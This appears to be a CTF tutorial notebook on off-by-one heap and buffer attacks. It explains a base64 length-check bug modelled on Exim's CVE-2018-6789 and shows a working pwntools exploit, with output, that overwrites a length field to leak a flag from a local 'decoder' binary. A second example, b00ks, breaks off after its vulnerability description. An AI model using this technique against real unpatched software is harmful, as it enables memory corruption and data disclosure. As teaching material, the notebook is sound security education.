# Off-By-One Attack

The program writes one more byte than what the buffer can hold.

## Example: decoder

Source: 0th-PKU-Geek-Game, [CVE-2018-6789](https://github.com/Exim/exim/commit/cf3cd306062a08969c41a1cdd32c6855f1abecf1)

References: 

- https://github.com/beraphin/CVE-2018-6789
- https://github.com/martinclauss/exim-rce-cve-2018-6789
- https://devco.re/blog/2018/03/06/exim-off-by-one-RCE-exploiting-CVE-2018-6789-en/
- https://straightblast.medium.com/my-poc-walk-through-for-cve-2018-6789-2e402e4ff588

Vulnerability: 

```c
void __cdecl b64decode(const char *src, int src_len, uint8_t *dst, int *dst_len, int max_len) 
{
    if ( max_len <= 3 * (src_len / 4) )           // not a safe check
        return;
    ...
}
```

The code assumes that the base64-encoded message length is alway a multiple of 4. If we craft a invalid base64 message with a length of 4n+3, we can control 2 bytes off the buffer. 

In this problem, the buffer size `max_len` is 700. We can craft a message with length 935 and control the content of `dst[699..700]`. The `dst[700]` is the lowest byte of `dst_len`. We then change `dst_len` from 700 (0x2bc) to 767 (0x2ff) so the program prints the flag that resides in `dst[700..767]`.

In [1]:
bin_filename = './decoder'
from pwn import *
from pwnlib import gdb, shellcraft

context.terminal = ['tmux', 'new-window']
context.arch = 'amd64'
elf = ELF(bin_filename)

!echo 'flag{hello}' > flag.txt

[*] '/ctf/work/off-by-one/decoder'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled


In [2]:
payload = b64e(b'a' * 699)
off = b64e(b'a\xff')
print(f'{off=}')
payload += off[:3]

def exploit(io):
    io.recvuntil(b'guess flag (base64):')
    io.sendline(payload)

off='Yf8='


In [3]:
io = process(bin_filename)
try:
    exploit(io)
    print(io.recvall())
    io.poll(block=True)
except Exception as e:
    io.kill()
    raise e

[x] Starting local process './decoder'
[+] Starting local process './decoder': pid 8836
[x] Receiving all data
[x] Receiving all data: 1B
[*] Process './decoder' stopped with exit code 0 (pid 8836)
[x] Receiving all data: 790B
[+] Receiving all data: Done (790B)
b' This is not the flag:\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xff\x02\x0

## Example: b00ks

Source: Asis CTF 2016 

Vulnerability: The function `readline_off_by_one(char* data, int len)` does not handle the corner case correctly. If the intput line is longer than `len` bytes, the `data[len]` will be set to `\0`.